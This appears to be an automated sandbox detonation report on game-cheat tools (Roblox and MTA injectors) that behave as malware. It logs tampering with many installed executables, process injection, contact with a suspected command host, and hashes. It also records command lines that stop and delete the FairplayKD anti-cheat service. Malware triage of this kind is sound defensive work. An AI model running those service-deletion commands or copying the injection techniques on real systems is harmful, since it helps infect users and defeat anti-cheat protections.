| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\dotnet.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\IEContentService.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\NisSrv.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome_proxy.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\excelcnv.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jjs.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\ktab.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\keytool.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Client\AppVLP.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\rmiregistry.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\plugin-container.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpEng.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseIdentity.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javadoc.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jstatd.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Integrator.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\servertool.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File created | C:\Program Files (x86)\MTA San Andreas 1.6\server\mods\deathmatch\deathmatch.dll | C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseAP.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jdeps.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\orbd.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\jjs.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\uninstall.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jar.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\msoia.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseImdsCollector.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\rmid.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSOUC.EXE | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender Advanced Threat Protection\SenseAPToast.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateComRegisterShell64.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jmap.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\minidump-analyzer.exe | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Exterm.exe"
C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe
"C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe"
C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe
C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD >nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete FairplayKD >nul
C:\Windows\SysWOW64\sc.exe
sc delete FairplayKD
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop FairplayKD1 >nul
C:\Windows\SysWOW64\sc.exe
sc stop FairplayKD1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete FairplayKD1 >nul
C:\Windows\SysWOW64\sc.exe
sc delete FairplayKD1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\28f16f29.bat" "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ddos.dnsnb8.net | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 105.84.221.44.in-addr.arpa | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 44.221.84.105:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/5056-0-0x00007FFC2D8C3000-0x00007FFC2D8C5000-memory.dmp
memory/5056-1-0x0000000000BC0000-0x0000000000C96000-memory.dmp
memory/5056-5-0x00007FFC2D8C0000-0x00007FFC2E382000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\MontanaInject.exe
| MD5 | 16d4eec72ee69f6acae5a362488dcac7 |
| SHA1 | 014d4b32236bc6dc648aeddf6819e1e0e62718d8 |
| SHA256 | d2d80e8ba8030df48bd0c485ec83b5bdf3c500cb84cdaca664e9fb6b1b4b6c9f |
| SHA512 | 1f320a07d98ce30f693429869830341e789c6ca2dc95d6fc148f5ddb141793cc877ad8cab9459af2caac1919a1ae245c12ce0f1ee2bed0f01c06eddb734cc61c |
memory/2724-15-0x0000000000300000-0x0000000000319000-memory.dmp
memory/5056-17-0x00007FFC2D8C0000-0x00007FFC2E382000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\OUsJaT.exe
| MD5 | 56b2c3810dba2e939a8bb9fa36d3cf96 |
| SHA1 | 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc |
| SHA256 | 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07 |
| SHA512 | 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e |
memory/4396-22-0x0000000000210000-0x0000000000219000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8TO9EJAY\k2[1].rar
| MD5 | d3b07384d113edec49eaa6238ad5ff00 |
| SHA1 | f1d2d2f924e986ac86fdf7b36c94bcdf32beec15 |
| SHA256 | b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c |
| SHA512 | 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6 |
C:\Users\Admin\AppData\Local\Temp\64817387.exe
| MD5 | 20879c987e2f9a916e578386d499f629 |
| SHA1 | c7b33ddcc42361fdb847036fc07e880b81935d5d |
| SHA256 | 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31 |
| SHA512 | bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f |
memory/2724-38-0x0000000000300000-0x0000000000319000-memory.dmp
memory/4396-46-0x0000000000210000-0x0000000000219000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\28f16f29.bat
| MD5 | 98b41a3e68bb337885a2fdee8e6f5284 |
| SHA1 | fa22db051a62f12c0acc3dab0d3f56611c75c4d1 |
| SHA256 | fe94f2597c808ee5490802a2bebddcd98e22de05b3a5e768398400a1a91b1db6 |
| SHA512 | cd63838ceda384dcfd2d21823ba0418e03976857f981b307a42d28d76b0e63715b854bbcb3a972bec2f735b40469bfd883be3229ef7b7de1f4a3ac9249cd67bf |
Analysis: behavioral8
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
157s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_DeadlySafe.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/372-0-0x00007FF676BF9000-0x00007FF676F65000-memory.dmp
memory/372-2-0x00007FF9D37C0000-0x00007FF9D37C2000-memory.dmp
memory/372-1-0x00007FF9D37B0000-0x00007FF9D37B2000-memory.dmp
memory/372-3-0x00007FF676BF0000-0x00007FF6774A6000-memory.dmp
memory/372-4-0x00007FF676BF9000-0x00007FF676F65000-memory.dmp
memory/372-5-0x00007FF676BF0000-0x00007FF6774A6000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
92s
Max time network
151s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node63.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/1676-0-0x00000000745DE000-0x00000000745DF000-memory.dmp
memory/1676-1-0x0000000000420000-0x000000000042A000-memory.dmp
memory/1676-2-0x0000000004E30000-0x0000000004ECC000-memory.dmp
memory/1676-3-0x0000000005480000-0x0000000005A26000-memory.dmp
memory/1676-4-0x0000000004ED0000-0x0000000004F62000-memory.dmp
memory/1676-5-0x0000000004E00000-0x0000000004E0A000-memory.dmp
memory/1676-6-0x0000000005030000-0x0000000005086000-memory.dmp
memory/1676-7-0x00000000745D0000-0x0000000074D81000-memory.dmp
memory/1676-8-0x00000000745DE000-0x00000000745DF000-memory.dmp
memory/1676-9-0x00000000745D0000-0x0000000074D81000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
144s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_vbrSafe.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/3328-0-0x00007FF798AF9000-0x00007FF798E62000-memory.dmp
memory/3328-2-0x00007FFB57AC0000-0x00007FFB57AC2000-memory.dmp
memory/3328-1-0x00007FFB57AB0000-0x00007FFB57AB2000-memory.dmp
memory/3328-4-0x00007FF798AF0000-0x00007FF79939F000-memory.dmp
memory/3328-5-0x00007FF798AF9000-0x00007FF798E62000-memory.dmp
memory/3328-6-0x00007FF798AF0000-0x00007FF79939F000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-584106483-899802418-1877852863-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
| N/A | N/A | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\$MontanaRoblox\MontanaExecutor.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2228 wrote to memory of 4752 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe | C:\$MontanaRoblox\MontanaExecutor.exe |
| PID 2228 wrote to memory of 4752 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe | C:\$MontanaRoblox\MontanaExecutor.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\RobloxExploit.exe"
C:\$MontanaRoblox\MontanaExecutor.exe
"C:\$MontanaRoblox\MontanaExecutor.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\$MontanaRoblox\MontanaExecutor.exe
| MD5 | dabf953588aa169685126dde24d55251 |
| SHA1 | b9590c74690b23299f0bad3c1efc20cafbc0c6c5 |
| SHA256 | 4bb72a438218807b830f27c6525d46e840fb012b8cb40fc62c78d59e70fd0216 |
| SHA512 | 541cefa2536a0e7ed3e047a08d425908f42cf8466ed4f5badbc579ea1d2a4e11feebbee9e573350209a399739ced24990124d354c634e648a091ed78f8c254ce |
C:\$MontanaRoblox\MontanaExecutor.exe.config
| MD5 | b1f8f837fddfb84d7aeef9e31ff6b4e8 |
| SHA1 | 4901c36feba3900eaa7455c5a4a983d3a0242723 |
| SHA256 | f8d8a1dd30f16ecf136589b99d47653bcde6a2d6cf7b4917001feb6d4da1d447 |
| SHA512 | 7111bf52eeecf1e5cdb3f346da28902973ea1f10a588665e2a5ab3be2a71b89b7184fb24e751e9b5980f825d3120a274f0bbf67e183ef1430dd96eb7dacd5120 |
memory/4752-114-0x00007FFA8CFA3000-0x00007FFA8CFA5000-memory.dmp
memory/4752-115-0x000002CBCA6C0000-0x000002CBCA6DA000-memory.dmp
C:\$MontanaRoblox\Guna.UI2.dll
| MD5 | c19e9e6a4bc1b668d19505a0437e7f7e |
| SHA1 | 73be712aef4baa6e9dabfc237b5c039f62a847fa |
| SHA256 | 9ac8b65e5c13292a8e564187c1e7446adc4230228b669383bd7b07035ab99a82 |
| SHA512 | b6cd0af436459f35a97db2d928120c53d3691533b01e4f0e8b382f2bd81d9a9a2c57e5e2aa6ade9d6a1746d5c4b2ef6c88d3a0cf519424b34445d0d30aab61de |
memory/4752-117-0x000002CBE5B00000-0x000002CBE5D14000-memory.dmp
C:\$MontanaRoblox\FastColoredTextBox.dll
| MD5 | 4719b02693486f3610a0cba3f88e3719 |
| SHA1 | ff4335aacf19037c3879d371788650d1681e5dd1 |
| SHA256 | a19bf2722cef29430e75f09c1f7a17baf456ccaed16ec6584f417d03214598f3 |
| SHA512 | 3980726c6ce280973089b38c81242ddb5f22713abb66072df43bfd58eb9d2c476540475cfae2105a2109452e5cadaca310df99d3cf673d8335f2ba0f743d9b72 |
memory/4752-120-0x000002CBCC430000-0x000002CBCC482000-memory.dmp
memory/4752-119-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp
memory/4752-121-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp
memory/4752-122-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp
memory/4752-123-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp
C:\$MontanaRoblox\ForlornApi.dll
| MD5 | 31f7684cd01d453008660da9e52f4030 |
| SHA1 | 53f8165a98f4cb4d8b23bb9610389bac3d058595 |
| SHA256 | 6c7c6ccd328826aee998c826e2666441224f7d158dfe71b2c3270b0dbf8970aa |
| SHA512 | de512c844b4a76c27216082cefe76482e93d74dcf34e134bd7e3ff4bfc852d3e3b5acd24ce0cee2eadc943ad84471198f383a5cc83b03fb68e1b389057e01d47 |
memory/4752-127-0x000002CBE5AF0000-0x000002CBE5AF8000-memory.dmp
memory/4752-128-0x00007FFA8CFA0000-0x00007FFA8DA62000-memory.dmp
Analysis: behavioral27
